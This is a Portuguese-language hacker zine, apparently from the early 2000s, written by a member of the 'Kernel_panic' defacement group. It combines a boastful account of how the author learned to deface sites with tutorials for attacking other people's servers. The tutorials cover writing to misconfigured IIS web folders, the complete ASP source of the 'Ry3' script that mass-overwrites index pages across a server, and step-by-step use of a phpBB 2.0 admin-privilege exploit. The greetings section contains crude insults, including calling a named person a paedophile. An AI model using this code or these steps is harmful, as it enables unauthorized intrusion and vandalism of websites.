Acid Zine n°1 - Para melhor visuallização mantenha maximizado - Salvar em seu PC -
No bloco de notas ativar quebra de linha automatica(Editar) - Sou bonito fala ae!!
- - - - - - - - - - - -
_ ____ __ _____ ____ ___ ____ ______
/ \ / __| | | | _ \ / __| / _ \ | _ \ | ____\
| O | | / | | | | \ | | / | / \ | | | \ | | |_
| | | | | | | | | | | | | \_/ | | | || | _|
| | | | \___ | | | |_/ | ________ | \__ | | | |_/ | | |___
/__|__\ \_____| |__| |_____/ |________| \____| \___/ |____/ |_____/ -------------------------------------------------------------------------
Site::----------------WWW.KPcrime.org
Canal::---------------#kpcrime in brasMERDA
eMail::---------------Kernel_panic@hacker.am
Kernel_panic he are : Acid_c0de - Paiste - __k__ - Sc0n - Gary_sagara
"Mouse não encontrado. Bater no gato (S/N)?"
|
|.|
|.|
|\./|
|\./|
. |\./| .
\^.\ |\\.//| /.^/
\--.|\ |\\.//| /|.--/
\--.| \ |\\.//| / |.--/
\---.|\ |\./| /|.---/
\--.|\ |\./| /|.--/
\ .\ |.| /. /
_ -_^_^_^_- \ \\ // / -_^_^_^_-_
- -/_/_/- ^ ^| ^ ^ -\_\_\- -
|
|
-=[ INtroDução - (hhmmm....) ]=-
-=[ Eu ]=-
Acho q ninguem sabe quem sou sou, intao vamos falar. Sou um menino de XX anos que frequenta o
irc a 3 meses, sou o fonder do grupo Kernel_panic( #kpcrime,eu jah escrevi lah em cima mais como
tem pessoas que nao leeem o titulo coloco aqui novamente).
tenho amizades e inimizades, mais eu acho q se vc nao gosta de mim deve vir falar em meu pvt,
mais isso nao vem ao caso agora. decidi fazer esta zine por que nao tinha nada para fazer
numa sexta a tarde, intaum reuni algumas coisas q sei e decidi publicar aqui.
Se você tem alguma coisa que queira publicar na proxima zine entre em contato comigo.
PAra enche linguiça vou colocar minha historia
Em meados de 2002 ( junho ou por ai ) começei a fazer meu curso tao desejado de informatica, o basico!!!Nossa.!!!!!!Era um prazewr nao faltava nenhum dia sequer, mais ainda nao ti8nha pc em casa.Chegava no curso mais ou menos uma hora antes para ficar nos bate papos.... afffff....
Em um belo dia um cara me falo que havia um belo site que falava sobre hacking, e me deu o endereço o www.6666.cjb.net. PAssei algum tempo navegando nele e lendo algumas coisas que eu nem entendia o q era, foi um erro, entrei na sessão LAmmer e reparei que os links estavam meios diferentes mais mesmo assim decidi continuar, no primeiro click em "como se tornar um hacker" foi que tudo começou.........
Mais de um milhao de janelas se abriram na minha frente.....putz..minhas pernas adormeceram na hora....me olhos brilharam....porra como ele fez isso????meu prof° faltou ver cristo, ficou loko da vida e me retirou da sala.
Com o passar do tempo começei a frequentar mais sites hackers como o Cemiterio hacker, central do hacker, atividade hacker e talz( esses sites tem todo conteudo puxados do mesmo lugar).
Começei a me enteresar em HTml, fiz a minha primeira page no tripod, mais ainda com o assistente e sem net em ksa, apenas poucos minutos em meu curso.Mais ou menos em setembro ganhei meu PC. Nossa foi o melhor dia da minha vida um dia que ninca vou esquecer, foi um Athlon 1.6, 40GB, 128mb com o windows ME, mais ainda nao tinha telefone e nao acessava a net de casa, fazia tudo emmeu curso.LOgo nos primeiros dias jah domava o HTml e fiz uma pagina com o nome de www.lobopage.cjb.net( elevando que meu apelido é Lobinho....nao vao me caçoar no irc seus merdas!!!!!)Essa foi a minha segunda pagian e primeira em html.
Como o tempo começei a me enteresar em java, pois foi isso que me colocou nesse mundo, fiz entao o www.arp666.cjb.net( pagina que ainda esta no ar)coloquei uns efeitos em java html e talz. Foi em pessquisas que conheci o IRC, logo depois fiz o www.h4k3.kit.net, foi a page mais loka do memento, jah me sentia o super hacker.Quando minha casa foi abençoada com a oitava maravilha do mundo, o telefone tudo se abriu.LOgo no primeiro dia entrei no irc, no #hacker, e conheci o THB_MAtrix, e entrei no clan #THB_Clan, era tudo 7 maravilhas, começei a me enteresar em defaced quando comprei a revista H4CK3R e vi defaceds do grupo Red_eye, hax0rs Lab.Começei a frequentar mais o knal red_eye mais nao aprendia nada, fazia pergutas toscas e sem sentido.
Em um belo dia conheci o Evolui...(beijo morzin...lembrei do c :D )
Um kra que wonava sites e registrava no zone-h( nao era tao burro, jah sabia o que era sites bons de segurança) o kra mne ensinou RDS, , vamos admtir que esse ataque é meio falho, pois nao existem mais sites vullneraveis.
Começei a usar o nick _H4K3_(devido ao site que eu tinha)com o tempo o Evolui me ensinou PDw, nossa ai eu jah me senti o super hacker, wonanva pages( bem soh redeface, mais era soh o começo) montei o 0P3N, atuamos um dia, dai fui instalar o LInux em minha casa, o Mandrake, que soh dava uma unica mensagen de erro "kernel_panic", fiquei loko,tanta raiva que montei o grupo. :D
Com algum tempo o Faisca_Sk8 (dawe cowboy :) ) me aprensentou o Ry3.Asp codado pelo Sujos e me deu uma força pois estava em breve a desistir, foi ai que em um belo dia achei o scan do arplhmd, estava completo agora, fiz muitos mass, conheci muitas pessoas, muitos canais.
Dai decidi mudar de nick depois que wonaram meu site, fiquei brabo mais é a vida, agora sou o Acid_c0de - o gostoso do IRC.
No ultimo dia de meu curso foi publicado um deface meu na H4CK3R, metade de meu sinho jah esta realizado, meu prof° ficou orgulhoso, bem feito hahahahaha
Agora com um pouco mais de 2 meses mexendo com deface, estou aqui sentado em minha cadeira branca escrevendo essa merda que ninguem vai ler e ensinado um pouco d que sei e algumas coisas que achei por ai...
Então vamos ao q interresa.
-=[ Agora sim a introdução ]=-
///////
// X X
// >
/ \__~/
|| /////
(\ \) (~) // o
( \ \ / / // >
( \ \/ /____________/ \__O
( \__/ _____\//
/ | /( / / ______)/
( | // \ \ / / ( )
\ () \ \O/ `
\ | ) )
) ) / /
( |_ / /_
(____> (____>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|.|
|.|
|\./|
|\./|
. |\./| .
\^.\ |\\.//| /.^/
\--.|\ |\\.//| /|.--/
\--.| \ |\\.//| / |.--/
\---.|\ |\./| /|.---/
\--.|\ |\./| /|.--/
\ .\ |.| /. /
_ -_^_^_^_- \ \\ // / -_^_^_^_-_
- -/_/_/- ^ ^| ^ ^ -\_\_\- -
|
|
-=[ Indice ]=-
-=[id 1( Usando o PDW )------------------------------------Acid_c0de]=-
-=[id 2( Usando o ry3.asp )--------------------------------Acid_c0de]=-
-=[id 3( ArpLhmd )-----------------------------------------Acid_c0de]=-
-=[id 4( DDos )--------------------------------------------Acid_c0de]=-
-=[id 5( Rds )--------------------------------nem sei quem escreveu]=-
-=[id 5( SSl )-----------------------------------------------ViperX]=-
-=[id 6( CPanel )-----------------------------------------Acid_c0de]=-
-=[id 7( PHPbb 2.0 )--------------------------------------Acid_c0de]=-
|
|.|
|.|
|\./|
|\./|
. |\./| .
\^.\ |\\.//| /.^/
\--.|\ |\\.//| /|.--/
\--.| \ |\\.//| / |.--/
\---.|\ |\./| /|.---/
\--.|\ |\./| /|.--/
\ .\ |.| /. /
_ -_^_^_^_- \ \\ // / -_^_^_^_-_
- -/_/_/- ^ ^| ^ ^ -\_\_\- -
|
|
-=[ Pdw = Pasta da Web ]=-
Tpw = Vulnerabilidade para explorar e desconfigurar paginas
Sistemas falhos = Ruindow$ 2000, nt ,e asim $u$$e$ivamente
Nota = SUX
Bem esta talvez seja umas das tecnicas mais tsc's de invadir um sistema, so de pensar que
ainda existe admin que deixa esta falha assim me da enjoos :(~
Esta é uma falha resultante na mal configuração do servidor, assim deixando vulneravel a
qualquer individuo entrar e vasculhar todo o servidor.
Primeiro vamos encontar um site vulneravel.
Vou lah com o meu scaner codado pelo arplhmd( www.arplhmd.cjb.net ) e coloco em scan a minha
lista feita por outro programa codado pelo arplhmd.
Blz!!!!!!Achei um site!!!!!R0x
Garanto q vc vai dizer isso...........
aqui vai um exemplo q nem sei se quando vc pegar esta zine este site vai estar vull ainda
http://hacker.webhostme.com
Vc vai pensar: Blz achei um site agora vou wonar, mais como????? :/
Assim é facil:
Você vai ate meus locais de rede ( lugar que eu acho que voce nunca abriu neh? Sabia :/ ), clica em adicionar novo local de rede e coloca o endereço la http://hacker.webhostme.com e de OK
Vai demorar um pouco e se der certo vai aparecer uma caixinha pedindo para confirmar ai vc confirma e espera abrir a janela com todo o conteudo do site.
R0x neh?
Nao!!!! Eu acho essa vull vergonhosa, nao q eu nao goste de quem usa ela, se mesmo pq eu usei muito ela, mais com o tempo enjooa sabe.
Depois dela aberta vc podera modificar o q quiser inclusive as index, mais tem muitos sites que vc abre a pasta e nao consegue grava nada nele. POr isso fike esperto.
|
|.|
|.|
|\./|
|\./|
. |\./| .
\^.\ |\\.//| /.^/
\--.|\ |\\.//| /|.--/
\--.| \ |\\.//| / |.--/
\---.|\ |\./| /|.---/
\--.|\ |\./| /|.--/
\ .\ |.| /. /
_ -_^_^_^_- \ \\ // / -_^_^_^_-_
- -/_/_/- ^ ^| ^ ^ -\_\_\- -
|
|
-=[ Ry3.asp ]=-
Tpw = Exploit para total acesso a maquinas servidoras
Sistemas falhos = Ruindow$ 2000, nt ,e asim $u$$e$ivamente
Nota = R0x ( para o xpt por que a vull é tosca)
Aqui veremos o uso do famoso Ry3 codado pelo Sujos do Red Eye.
Ele se trata de um exploit que te da total controle do servidor vullnervel a pdw.
Mais vc deve estar pensando: POxa! deve ser um xpt para rodar no dos e todos aqueles codigos me deixam com dor de cabeça!!!!
Nao!! POde esfriar a cuca pq nao se trata de nada disso.
Vamos ao Uso:
Quando voce descobre um site vullnervel a pdw voce abre a pasta e cola o xpt lah.
Ai você vai em seu navegador preferido, que garanto q é o Internet Explorer, e digita:
www.servidorvullneravel.com/ry3.asp
Pronto a magica esta feita!!!! :D
Agora é so vc fazer o sseguinte, aqui vamos ultilizar um exemplo simples:
Todo servidor IIS ou na maioria das vezes hospeda os sites na pasta c:\wwroot\ ou c:\inetpub , mais isso aparece no xpt em "vc esta em: "
Vamos supor que vc esteja em c:\wwroot. Bem o site que vc colocou o xpt ficara assim c:\wwroot\servidorvulneravel\ry3.asp. O q isso quer dizer?hun.....?nao escutei....?
Dexa pra lah eu falo................
Quer dizer que so sites estao na pasta c:\wwroot.
ò q legal
Mais para que serve isso tudo?
Simples, com isso você podera wonar ( para os mais desinformados wonar significa desconfigurar uma pagina ) mais sites no servidor.
Mais como vou saber a url do site?
Quando vc achar os diretorios vc vai colocar em "caminho" no ry3 assim:
c:\wwroot ( supondo o servidor acima )
Ai vai aparecer os sites que deram OK assim
OK em site 1
OK em site 2
OK em site 3
OK em site 4
OK em site 5
OK em site 6
OK em site 7
OK em site 8
Dai você pega a url do primeiro site e completa com o nome das pastas
EX:www.site1.com, www.site2.com ( suppondo q o server seja www.servidorvullneravel.com )
Você podera pegar o que eu melhorei em http://www.kpcrime.kit.net/ry3.zip
Ai vai o codigo fonte do 1° ry3, mais nao esqueça que ele tem que ser em uma pagina asp hein o burro!!! :/
<%
On Error Resume Next
Set Objeto=Server.CreateObject("Scripting.FileSystemObject")
if request("t5") <> "" then
Set ObjPasta = Objeto.GetFolder(request("t5"))
end if
%>
<%On Error Resume Next
if request("t3") <> "" then
Set ObjPasta2 = Objeto.GetFolder(request("t3"))
set ObjFso=server.CreateObject("Scripting.FileSystemObject")
var_caminho=request("t3")
For Each Pasta in ObjPasta2.Subfolders
Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.htm", 2, True, False)
ObjAbreArq.writeline request("t4")
set ObjAbreArq = nothing
Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.html", 2, True, False)
ObjAbreArq.writeline request("t4")
set ObjAbreArq = nothing
Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.asp", 2, True, False)
ObjAbreArq.writeline request("t4")
set ObjAbreArq = nothing
Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.htm", 2, True, False)
ObjAbreArq.writeline request("t4")
set ObjAbreArq = nothing
Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.html", 2, True, False)
ObjAbreArq.writeline request("t4")
set ObjAbreArq = nothing
Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.asp", 2, True, False)
ObjAbreArq.writeline request("t4")
if err then
response.write "
Erro em: " & pasta.name
err=0
else
response.write "
OK em " & pasta.name
end if
set ObjAbreArq = nothing
next
set ObjFso=nothing
Set ObjPasta2 = nothing
set ObjFso = nothing
end if
%>
Diretórios Numerados |
Arquivos |
<% On Error Resume Next
dim contador
contador=1
For Each Pasta in ObjPasta.Subfolders
Response.Write Contador & "-) "& Pasta.Name & " " contador=contador+1 next%> |
<%On Error Resume Next
For Each Arquivo in ObjPasta.Files
Response.Write Arquivo.Name & " " Next%> |
------------------------------------------------------------------------------------------------- Instruções de Uso ------------------ 1. Vá ao site que você deseja mudar as permissões de user para admin usando um navedor. 2. Ache o local de diretório básico do site para o Script, i.e. se a página principal fosse http://www.server.com/phpBB2/index.php o local de diret¢rio básico seria http://www.server.com/phpBB2 e então edite a fonte do exploit HTML deste Script de forma que a linha escrita - form method="post" action="http://www.base_url_Aqui.com/admin/admin_ug_auth.php" - seja o local correto á página de admin. ( mude somente o nome da pagina, ou seja, somente substitua "www.base_url_Aqui.com" pelo link da pagina, por exemplowww.paginaphpbb2.com) 3. Va ate "Memberlist" (normalmente localizado ao topo com o resto dos links...) 4. Procure em "Memberlist" a conta específica que você deseja mudar as permissões para admin, e clique no nome da conta para trazer para cima o perfil. 5. Anote direito o número ao término da URL da página que você esta atualmente é onde diz "u =? ". (este é o valor notado, se foi apagado algum usuário da Pilha, então o próximo ao seu número ou entao nome de usuário da lista de membros debaixo da coluna de ``#´´ será seu verdadeiro número de usuário, caso contrário não vai ser. - ( Então não se pode confiar no numero de ID.) 6. Clique em "logout" no forum (se você não fazer isto Nao ira funcionar, e lhe dará uma mensagem de permissão negada) 7. Digite o seu número de usuário na caixa de ID abaixo , e clique em submit... Nota: Depois de clicar em submit você adquirirá uma página que lhe pede log in, simplesmente ignore isto e então va fazer loggon no forum de modo habitual. - Se tiver êxito, haverá um link ao fundo de toda declaração da página no forum "Go To Administration Panel"... e opções adicionais aparecerão na tela quando você estiver vendo uma linha específica para permitir a editar ou apagar posts no site etc. Falow valeu pela atenção, pois acho que você foi o unico besta que leu essas merda. E ate a proxima..... ========================================================================================= | |.| |.| |\./| |\./| . |\./| . \^.\ |\\.//| /.^/ \--.|\ |\\.//| /|.--/ \--.| \ |\\.//| / |.--/ \---.|\ |\./| /|.---/ \--.|\ |\./| /|.--/ \ .\ |.| /. / _ -_^_^_^_- \ \\ // / -_^_^_^_-_ - -/_/_/- ^ ^| ^ ^ -\_\_\- - | | -=[ End ]=- Bem aqui termino essa zine, espero que gostem pq se nao gostaram que se foda....... Se alguem quiser postar alguma coisa aqui, um tuto que vc tenha feito e talz kernel_panic@hacker.am = Greetz = H4F43L - Boquinha de acerola segundo seus amigos __k__ - Muléki chato do __k__raio Paiste - 18 anos e a mãe dele poe ele de castigo ainda Gary_sagara - Fundou ou uns 20 knais so para ter bastante @ Sc0n - lol ph3r0m0n3 - "to aqui fazendo o deface das crinança" Evolui - Pedofilo renomado R41l4nd3r - "tenho 18 anos e ainda nao comi nenhuma mina :/ " Code_black_ninja - 10 anos de IRC e ainda nao sabe mexer no chanserv UNderCow - tem a doença da vaca loka D14bl0_ - Medium espiritual Faisca_sk8 - cowboy de rodeo ( nao estou brincando :| ) tambem agradeço aos knais #thb_clan - #System_crack - #Ir4dex - #f3pn - #NHC - #BugTravel ______EOF_________